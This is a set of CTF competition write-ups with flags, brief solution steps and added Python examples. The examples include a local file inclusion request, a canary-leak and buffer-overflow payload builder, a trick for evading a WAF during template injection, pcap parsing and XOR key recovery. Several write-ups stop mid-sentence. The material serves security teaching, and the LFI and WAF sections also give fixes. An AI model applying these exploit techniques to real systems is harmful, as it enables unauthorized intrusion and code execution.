ALIEN INCLUSION

Proof of flag

FLAG = ctf{b513ef6d1a5735810bca608be42bda8ef28840ee458df4a3508d25e4b706134d}

Summary of the vulnerabilities identified

We control which file gets included through the start POST parameter, so we can point it at the path of the flag.php file.

Proof of solving

When we first access the page we are greeted by what appears to be the source code of index.php. Based on that source, the name of the challenge and its description ("Keep it local and you should be fine. The flag is in /var/www/html/flag.php."), it is clear we need to set the start POST parameter to the absolute path of the flag and also supply any value for the start GET parameter (the query-string argument) so that the exit on line 5 of the script is never reached.
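As an added example (not part of the original writeup), the request shape described above built with the standard library, next to the allowlist check the vulnerable include() should have used. The base URL, the page names in INCLUDABLE and the pages directory are assumptions; only the flag path comes from the challenge description.

```python
"""Added example, not from the original writeup: the ALIEN INCLUSION request
and the allowlist that the vulnerable include() should have used."""
import os
from typing import Optional
from urllib.parse import urlencode
from urllib.request import Request

FLAG_PATH = "/var/www/html/flag.php"       # given in the challenge description


def build_lfi_request(base_url: str, flag_path: str = FLAG_PATH) -> Request:
    """GET ?start=<anything> keeps the script from reaching exit();
    POST start=<path> is the value that ends up in include().
    Only prepares the Request; pass it to urlopen() to actually send it."""
    url = base_url + "?" + urlencode({"start": "x"})
    body = urlencode({"start": flag_path}).encode()
    return Request(url, data=body, method="POST",
                   headers={"Content-Type": "application/x-www-form-urlencoded"})


# Hypothetical allowlist for the fixed version of the page router.
INCLUDABLE = {"home", "about", "contact"}


def safe_include_path(name: str, base_dir: str = "/var/www/html/pages") -> Optional[str]:
    """Hardened counterpart: the client picks a page *name*, never a path.
    The realpath check stays in place even if the allowlist later grows."""
    if name not in INCLUDABLE:
        return None
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, name + ".php"))
    if not path.startswith(base + os.sep):
        return None
    return path


if __name__ == "__main__":
    req = build_lfi_request("http://challenge.example/index.php")   # assumed host
    print(req.get_method(), req.full_url, req.data)
    print(safe_include_path("home"), safe_include_path("../flag"))
```

The GET parameter only has to exist; its value is irrelevant, which is why "x" is enough.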

BASIC COMS

Proof of flag

FLAG = ctf{ca314be22457497e81a08fc3bfdbdcd3e0e443c41b5ce9802517b2161aa5e993}

Summary of the vulnerabilities identified

Looking at the HTTP requests captured by Wireshark in the given file, we find only 4 requests, one of which carries our flag as a GET parameter.

Proof of solving

Based on the challenge description and title, we know we should be looking for a "basic" protocol in the pcapng file. One of the most basic protocols is HTTP, and in Wireshark we can filter to show only HTTP requests and responses. Since there are only 4 requests and one of them carries a somewhat encoded message saying "The content of the flag is", we can guess that
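As an added example (not part of the original writeup), the same extraction done without Wireshark: a minimal classic-pcap reader that walks Ethernet/IPv4/TCP and pulls the query parameters out of every HTTP GET request line. The capture is constructed inside the script so it runs offline; the challenge file is a .pcapng, which tshark can convert first with `tshark -r capture.pcapng -F pcap -w capture.pcap`.

```python
"""Added example, not from the original writeup: pull the GET parameters out
of every HTTP request in a classic .pcap with only the standard library.
The capture is constructed in code (SAMPLE_PCAP below) so this runs offline."""
import struct
from urllib.parse import parse_qsl, urlsplit


def tcp_payload(frame: bytes):
    """TCP payload of an Ethernet/IPv4/TCP frame, or None for anything else."""
    if len(frame) < 54 or frame[12:14] != b"\x08\x00":   # EtherType IPv4
        return None
    ip = frame[14:]
    if ip[9] != 6:                                         # protocol != TCP
        return None
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    tcp = ip[ihl:total_len]
    data_off = (tcp[12] >> 4) * 4
    return tcp[data_off:]


def pcap_payloads(pcap: bytes):
    """Walk the record headers of a classic pcap file and yield TCP payloads."""
    magic = struct.unpack("<I", pcap[:4])[0]
    end = "<" if magic in (0xA1B2C3D4, 0xA1B23C4D) else ">"
    pos = 24                                                # global header
    while pos + 16 <= len(pcap):
        _sec, _usec, incl_len, _orig_len = struct.unpack(end + "IIII", pcap[pos:pos + 16])
        frame = pcap[pos + 16:pos + 16 + incl_len]
        pos += 16 + incl_len
        payload = tcp_payload(frame)
        if payload:
            yield payload


def http_get_params(pcap: bytes):
    """[(path, {param: value}), ...] for each segment that starts an HTTP GET.
    parse_qsl also undoes the '+' and %XX encoding of the parameter values."""
    found = []
    for payload in pcap_payloads(pcap):
        request_line = payload.split(b"\r\n", 1)[0]
        if not request_line.startswith(b"GET "):
            continue
        target = request_line.split(b" ")[1].decode("latin-1")
        parts = urlsplit(target)
        found.append((parts.path, dict(parse_qsl(parts.query, keep_blank_values=True))))
    return found


# --- constructed capture: two GET requests on plain HTTP ---------------------
def _frame(payload: bytes) -> bytes:
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes([10, 0, 0, 2]), bytes([10, 0, 0, 1])) + tcp
    return b"\xaa" * 6 + b"\xbb" * 6 + b"\x08\x00" + ip


def _pcap(frames) -> bytes:
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)   # link type 1 = Ethernet
    for f in frames:
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return out


SAMPLE_PCAP = _pcap([
    _frame(b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"),
    _frame(b"GET /?msg=The+content+of+the+flag+is%3A+ctf%7Bsample%7D HTTP/1.1\r\n"
           b"Host: example.test\r\n\r\n"),
])

if __name__ == "__main__":
    for path, params in http_get_params(SAMPLE_PCAP):
        print(path, params)
```

The reader assumes each request line sits at the start of a TCP segment, which holds for small captures like this one; a request split across segments would need stream reassembly first.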

BAZOOKA

Proof of flag

ctf{9bb6df8e98240b46601db436ad276eaa635a846c9a5afa5b2075907adf39244b}

Summary of the vulnerabilities identified

Just a super simple buffer overflow (don't need to tell me "Try Harder", mom).

Proof of solving

In the first part the program prompts the user to input "#!@{try_hard3r}" to reach the vuln function, where the buffer overrun happens because scanf uses "%s" in its format string instead of "%Xs" (X being a maximum field width). First I find the libc base address and use a one_gadget to land on an execve("/bin/sh", 0, 0)

BRO64

Proof of flag

ctf{f38deb0782c0f252090a52b2f1a5b05bf2964272f65d5c3580be631f52f4b3e0}

Summary of the vulnerabilities identified

Connecting with netcat and sending some data returns an HTTP Bad Request error.

nc 35.198.183.125 31604
asdf
<head></head>
<title>Error response</title>

<body></body>
<h1>Error response</h1>
Error code 400.
Message: Bad request syntax ('asdf').
Error code explanation: 400 = Bad request syntax or unsupported method.

So the natural thing is to use curl. With curl you get some weird JSON data.

DARKMAGIC

Proof of flag

dctf{857ee5051eeccf7cbdfa0ab9986d32f89158429fc12348e15419a969ddcb6bfb}

Summary of the vulnerabilities identified

The vulnerability was a format string bug plus a buffer overflow.

Proof of solving

You use the format string to leak the stack cookie and the buffer overflow to redirect execution to the getshell function. Everything happens in a loop; we overwrite the loop variable from 1 to 2 by sending 100 "A"s followed by a '\x02', and sending "%35$p" prints the value of the stack cookie. I used 0x40087a, a ret instruction, as the first return address because otherwise the stack is misaligned and the program crashes.
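As an added example (not part of the original writeup), the two stages above assembled from the values the text gives: parsing the "%35$p" leak into a canary, sanity-checking it, and laying out padding, canary, saved rbp, the ret gadget and the getshell address. The ret gadget 0x40087a, the "%35$p" leak and the 100 "A"s + '\x02' loop bump come from the writeup; the getshell address and the distance from the buffer to the canary are placeholders to be replaced with the real values.

```python
"""Added example, not from the original writeup: the two DARKMAGIC payload
stages assembled from the values the text gives.  Offsets and the getshell
address are NOT in the writeup; they are placeholders to be replaced."""
import struct

RET_GADGET = 0x40087A              # from the writeup: a lone `ret` to fix stack alignment
FMT_LEAK = b"%35$p"                # from the writeup: prints the canary as 0x...
LOOP_BUMP = b"A" * 100 + b"\x02"   # from the writeup: overwrite the loop counter 1 -> 2

GETSHELL_ADDR = 0x400ABC           # ASSUMED placeholder: take the real one from disasm/nm
CANARY_OFFSET = 72                 # ASSUMED placeholder: bytes from buffer start to canary


def parse_canary(leaked: bytes) -> int:
    """Turn the '%p' output into an int and sanity-check it: glibc stack
    canaries on x86-64 end in a NUL byte, so the low byte must be 0."""
    value = int(leaked.strip(), 16)
    if value & 0xFF:
        raise ValueError("low byte is not 0: probably not the canary (wrong %N$p index?)")
    return value


def build_overflow(canary: int, getshell: int = GETSHELL_ADDR,
                   canary_offset: int = CANARY_OFFSET) -> bytes:
    """buffer padding | canary | saved rbp | ret gadget | getshell.
    The extra `ret` keeps rsp 16-byte aligned when getshell hits a movaps."""
    def p64(v: int) -> bytes:
        return struct.pack("<Q", v)

    return (b"A" * canary_offset
            + p64(canary)
            + p64(0xDEADBEEF)      # saved rbp, any value works
            + p64(RET_GADGET)
            + p64(getshell))


if __name__ == "__main__":
    canary = parse_canary(b"0x7d4c1a2b3c4d5e00")   # constructed leak
    payload = build_overflow(canary)
    print(len(payload), payload[CANARY_OFFSET:CANARY_OFFSET + 8].hex())
```

Sending order follows the text: LOOP_BUMP first so the loop runs a second time, FMT_LEAK to read the canary, then build_overflow() with the parsed value.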

DUMB-DISCORD

Proof of flag

ctf{1b8fa7f33da67dfeb1d5f79850dcf13630b5563e98566bf7b76281d409d728c6}

Summary of the vulnerabilities identified

Invite the bot to a Discord server, give it the 'dctf2020.cyberedu.ro' role, send the payload '/s基ay //getflaggetflag' to get the encoded flag, then decode it.

Proof of solving

First we decompile the binary with uncompyle6 and look at the code. Before pasting all of it, the obfuscated strings need replacing: a simple XOR encoding is used, and the included decoding function can be run to swap them for the real strings. We end up with this:

HTTP-FOR-PROS

Proof of flag

CTF{75df3454a132fcdd37d94882e343c6a23e961ed70f8dd88195345aa874c63e63}

Summary of the vulnerabilities identified

The application is vulnerable to Server Side Template Injection via the content GET parameter, which can be used to get code execution on the system. It is not straightforward, since a Web Application Firewall filters our requests for forbidden words. The solution is to use Python string formatting to split the forbidden words so that they are not matched.
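As an added example (not part of the original writeup), why splitting a word with Python string formatting gets past a substring-matching WAF: the filter sees two harmless halves, while the template engine evaluating the expression glues them back together. The forbidden-word list and the `.format()` form of the split are assumptions; the writeup does not show the real WAF rules or the exact payload. The `render` function uses eval only as a stand-in for the template engine.

```python
"""Added example, not from the original writeup: a substring WAF versus a
word split with str.format().  The forbidden list is assumed."""

FORBIDDEN = ["__class__", "__globals__", "os", "popen", "import"]   # assumed WAF list


def waf_blocks(param: str, forbidden=FORBIDDEN) -> bool:
    """Naive WAF: reject the request if any forbidden word appears verbatim."""
    return any(word in param for word in forbidden)


def split_word(word: str) -> str:
    """Rewrite `word` as a format expression whose text no longer contains it."""
    half = len(word) // 2
    return '"{0}{1}".format("%s", "%s")' % (word[:half], word[half:])


def render(expression: str) -> str:
    """Stand-in for the template engine evaluating {{ expression }}.
    Deliberately unsafe, which is exactly what SSTI exploits."""
    return eval(expression, {"__builtins__": {}}, {})


if __name__ == "__main__":
    for word in ("__class__", "os"):
        expr = split_word(word)
        print(word, "->", expr, "| blocked:", waf_blocks(expr), "| renders:", render(expr))
```

The defensive takeaway is the mirror image: a keyword denylist on the raw parameter cannot see what the expression evaluates to, so the fix is to stop rendering user input as a template, not to extend the list.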

KALF GAME

Proof of flag

ctf{ddba6614a32456631c125eb1a4327c52686c71d909a92ec05ea5eb510eae81d9}

Summary of the vulnerabilities identified

The game is a basic snake game (the best snake I have ever played; thank you Lucian, you made my day happier). It hides the flag in strings stored on the stack, run through a rot13-like function, and the best part is that it was written in Rust, which is the best language humanity has produced so far.

MODERN LOGIN

Proof of flag

ctf{356c5e791de08610b8e9cb00a64d16c2cfc2be00b133fdfa5198420214909cc1}

Summary of the vulnerabilities identified

The challenge APK can be decompiled with online services. Scrolling through the source files and assets, we notice an mp3 that is not playable. Running file on it shows it is an archive; we decompress it and find obfuscated Python code. After cleaning up the code we start decoding its obfuscated strings, and one of them is our flag.

QR-MANIA

Proof of flag

CTF{2b2e8580cdf35896d75bfc4b1bafff6ee90f6c525da3b9a26dd7726bf2171396}

Summary of the vulnerabilities identified

Inspecting the pcap file in Wireshark I found HTTP responses carrying PNG images, each containing a QR code that decodes to a single character. The position of each character is stored in the EXIF data of the corresponding image.

Proof of solving

Extract HTTP objects with wireshark from the provided .pcap file:

STRIPPEDGO

Proof of flag

ctf{a4e394ae892144a54c008a3b480a1b22a6b64dd26c4b0c9eba498330f511b51e}

Summary of the vulnerabilities identified

Seek to the program's main (sym.go.main.main) and extract the string before it gets encrypted.

Proof of solving

We start off by running file

$ file rev_strippedGo_strippedGO
rev_strippedGo_strippedGO: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=pbHcqNyu7oMwNz2AOwlC/ipoepuEEs9kTpe_InyYc/zxH96PaxbdfxJ2l96QnT/-SUbqa7STSlM69LnCs6A, stripped

So it's a Go binary and it's stripped; at least the title didn't lie to us. We open it up in radare2.

STUG-REFERENCE

Proof of flag

ctf{32849dd9d7e7b313c214a7b1d004b776b4af0cedd9730e6ca05ef725a18e38e1}

Summary of the vulnerabilities identified

Use steghide to extract the flag from stug.jpg with the password stug.

Proof of solving

My teammates tried a lot of things, including brute forcing it with rockyou and plenty of stegano tools. I tried some "obvious" passwords like "dctf", "dctf2020" and "stug", and stug ended up working.

T3AM_VI3W3R

Proof of flag

DCTF{74a0f35841dfa7eddf5a87467c90da335132ae52c58ca440f31a53483cef7eac}

Summary of the vulnerabilities identified

Analysis of the VNC protocol.

Proof of solving

After firing up Wireshark and loading the provided .pcapng, we filter for the VNC protocol. Following the TCP stream of the first entry, we find that it spells out words with doubled letters.

The stream can be saved as a .txt file for later processing. After removing the extra letters and the dots we end up with a message that says:
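As an added example (not part of the original writeup), the same recovery done on the protocol rather than on the dumped text: a parser for the client-to-server half of an RFB (VNC) stream that keeps only KeyEvent messages. The doubled letters the writeup mentions are consistent with one KeyEvent for the press and one for the release of each key; that reading of the capture is an assumption, and the stream below is constructed to match it.

```python
"""Added example, not from the original writeup: decode the text typed over
VNC from the client-to-server RFB messages.  Keeping only key-down events
removes the doubled letters that a raw dump of the stream shows."""
import struct

# Sizes of the fixed-length client messages (RFB 3.x).  SetEncodings (2) and
# ClientCutText (6) carry a count/length field and are skipped separately.
FIXED_LEN = {0: 20, 3: 10, 4: 8, 5: 6}


def keyevents(stream: bytes):
    """Yield (down, keysym) for every KeyEvent; step over the other message types."""
    pos = 0
    while pos < len(stream):
        mtype = stream[pos]
        if mtype == 4:                                     # KeyEvent
            _, down, _pad, keysym = struct.unpack("!BBHI", stream[pos:pos + 8])
            yield bool(down), keysym
            pos += 8
        elif mtype == 2:                                   # SetEncodings
            n = struct.unpack("!H", stream[pos + 2:pos + 4])[0]
            pos += 4 + 4 * n
        elif mtype == 6:                                   # ClientCutText
            n = struct.unpack("!I", stream[pos + 4:pos + 8])[0]
            pos += 8 + n
        elif mtype in FIXED_LEN:
            pos += FIXED_LEN[mtype]
        else:
            raise ValueError(f"unknown client message type {mtype} at offset {pos}")


def raw_letters(stream: bytes) -> str:
    """What a naive dump shows: every KeyEvent, press and release alike."""
    return "".join(chr(k) for _, k in keyevents(stream) if 0x20 <= k <= 0x7E)


def typed_text(stream: bytes) -> str:
    """Text typed by the client: printable ASCII keysyms on key-down only."""
    out = []
    for down, keysym in keyevents(stream):
        if down and 0x20 <= keysym <= 0x7E:
            out.append(chr(keysym))
        elif down and keysym == 0xFF0D:                    # XK_Return
            out.append("\n")
    return "".join(out)


def _key(ch: str) -> bytes:
    """Constructed press+release pair for one ASCII key."""
    ks = ord(ch)
    return struct.pack("!BBHI", 4, 1, 0, ks) + struct.pack("!BBHI", 4, 0, 0, ks)


# constructed stream: SetEncodings(raw), the typed text, one FramebufferUpdateRequest
SAMPLE_STREAM = (struct.pack("!BBH", 2, 0, 1) + struct.pack("!i", 0)
                 + b"".join(_key(c) for c in "hi there")
                 + struct.pack("!BBHHHH", 3, 1, 0, 0, 800, 600))

if __name__ == "__main__":
    print(raw_letters(SAMPLE_STREAM))    # doubled letters, as in the Wireshark dump
    print(typed_text(SAMPLE_STREAM))
```

Feeding it a real capture means extracting the client-to-server bytes of the stream first (Wireshark's "Follow TCP Stream" with the direction set to the client side, saved as raw), and the parser assumes the stream starts at a message boundary after the handshake.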

WHY-XOR

Proof of flag

ctf{79f107231696395c004e87dd7709d3990f0d602a57e9f56ac428b31138bda258}

Summary of the vulnerabilities identified

We have a XORed flag that starts with 3 null bytes, so we can assume the key at least starts with "ctf". That turns out to be the correct key.

Proof of solving

I started by reading the challenge description, where it clearly says the flag format is "CTF{sha256}", so of course I tried "CTF" as the key; that didn't work, and I was confused for a while.
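As an added example (not part of the original writeup), repeating-key XOR with the two observations the writeups rely on: a 0x00 ciphertext byte means the key byte equals the plaintext byte at that position, and a known prefix (the flag format) gives the key stream directly. One generic routine stands in for both the DUMB-DISCORD string decoder and the WHY-XOR flag; the sample plaintext and key are constructed, and the filter that keeps only candidates ending in "}" is an assumption based on the flag format.

```python
"""Added example, not from the original writeup: repeating-key XOR, the
null-byte observation, and key recovery from a known flag prefix."""
import string


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR `data` with `key` repeated; XOR is its own inverse, so this both
    encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def null_positions(ciphertext: bytes):
    """Offsets where the ciphertext is 0x00: there, key byte == plaintext byte."""
    return [i for i, b in enumerate(ciphertext) if b == 0]


def candidate_keys(ciphertext: bytes, known_prefix: bytes, max_len: int = 16):
    """Keys (shortest first) that reproduce `known_prefix`, decrypt to printable
    text and end in '}' as a flag should.  Only keys no longer than the known
    prefix can be recovered this way; longer ones need more known plaintext."""
    stream = xor_bytes(ciphertext[:len(known_prefix)], known_prefix)   # key stream
    keys = []
    for n in range(1, min(max_len, len(stream)) + 1):
        key = stream[:n]
        plaintext = xor_bytes(ciphertext, key)
        if (plaintext.startswith(known_prefix)
                and plaintext.endswith(b"}")
                and all(chr(b) in string.printable for b in plaintext)):
            keys.append(key)
    return keys


# constructed sample in the challenge's style, key "ctf" as in the writeup
SAMPLE_PLAINTEXT = b"ctf{example_only_not_a_real_flag}"
SAMPLE_CIPHERTEXT = xor_bytes(SAMPLE_PLAINTEXT, b"ctf")

if __name__ == "__main__":
    print(SAMPLE_CIPHERTEXT.hex())
    print(null_positions(SAMPLE_CIPHERTEXT))          # starts with [0, 1, 2]
    print(candidate_keys(SAMPLE_CIPHERTEXT, b"CTF{"))  # the uppercase guess: nothing
    for key in candidate_keys(SAMPLE_CIPHERTEXT, b"ctf{"):
        print(key, xor_bytes(SAMPLE_CIPHERTEXT, key))
```

The three leading nulls are what the WHY-XOR summary noticed: with a 3-byte key equal to the first 3 plaintext bytes, the first 3 ciphertext bytes cancel to zero. The uppercase "CTF{" prefix yields no candidate, which is the dead end the writeup describes.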

YOPASS-GO

Proof of flag

pwndbg> x/69c 0x4c55f2
0x4c55f2: 99 'c' 116 't' 102 'f' 123 '{' 48 '0' 57 '9' 54 '6' 50 '2'
0x4c55fa: 51 '3' 57 '9' 51 '3' 99 'c' 101 'e' 51 '3' 56 '8' 48 '0'
0x4c5602: 99 'c' 51 '3' 99 'c' 102 'f' 54 '6' 57 '9' 54 '6' 99 'c'
0x4c560a: 54 '6' 99 'c' 53 '5' 57 '9' 97 'a' 48 '0' 56 '8' 53 '5'
0x4c5612: 99 'c' 100 'd' 101 'e' 48 '0' 102 'f' 55 '7' 101 'e' 100 'd'
0x4c561a: 100 'd' 49 '1' 51 '3' 56 '8' 50 '2' 102 'f' 50 '2' 101 'e'
0x4c5622: 57 '9' 48 '0' 57 '9' 48 '0' 50 '2' 50 '2' 48 '0' 97 'a'
0x4c562a: 98 'b' 100 'd' 102 'f' 57 '9' 97 'a' 54 '6' 51 '3' 57 '9'
0x4c5632: 54 '6' 99 'c' 56 '8' 56 '8' 125 '}'
pwndbg> x/1s 0x4c55f2
0x4c55f2: "ctf{0962393ce380c3cf696c6c59a085cde0f7edd1382f2e9090220abdf9a6396c88}"
ctf{0962393ce380c3cf696c6c59a085cde0f7edd1382f2e9090220abdf9a6396c88}

Summary of the vulnerabilities identified

Following the execution of the binary in gdb, I found a memequal call whose parameters are the input string and the flag in memory.